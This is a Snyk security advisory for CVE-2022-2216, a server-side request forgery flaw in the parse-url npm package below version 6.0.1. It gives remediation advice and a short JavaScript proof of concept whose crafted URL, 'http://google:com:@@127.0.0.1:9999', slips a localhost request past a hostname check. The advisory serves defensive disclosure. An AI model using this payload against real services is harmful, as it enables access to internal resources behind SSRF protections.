Server-side Request Forgery (SSRF) Affecting parse-url package, versions <6.0.1
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.19% (58th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-PARSEURL-2936249
- published 28 Jun 2022
- disclosed 28 Jun 2022
- credit Pocas
Introduced: 28 Jun 2022
CVE-2022-2216 Open this link in a new tabHow to fix?
Upgrade parse-url to version 6.0.1 or higher.
Overview
parse-url is an An advanced url parser supporting git urls too.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) in the parseUrl function, due to mishandling hostnames when processing usernames and passwords.
PoC:
const parseUrl = require("parse-url");
const express = require('express');
const http = require('http');
const app = express();
const isLocal = () => (req, res, next) => (req.connection.remoteAddress === '::ffff:127.0.0.1'|| req.connection.remoteAddress === '::1' ? true:false)
? next()
: res.json({'state':'You\'re not locally'});
parsed = parseUrl("http://google:com:@@127.0.0.1:9999/ssrf_check");
console.log(parsed);
app.get('/', (req, res) => {
if(parsed.resource == '127.0.0.1'){
res.send('Not good');
} else{
http.get(parsed.href)
res.send('Good');
}
});
app.get('/ssrf_check', isLocal(), (req, res) =>{
console.log('ssrf bypass');
res.send(true);
});
app.listen(9999);
References
CVSS Scores
version 3.1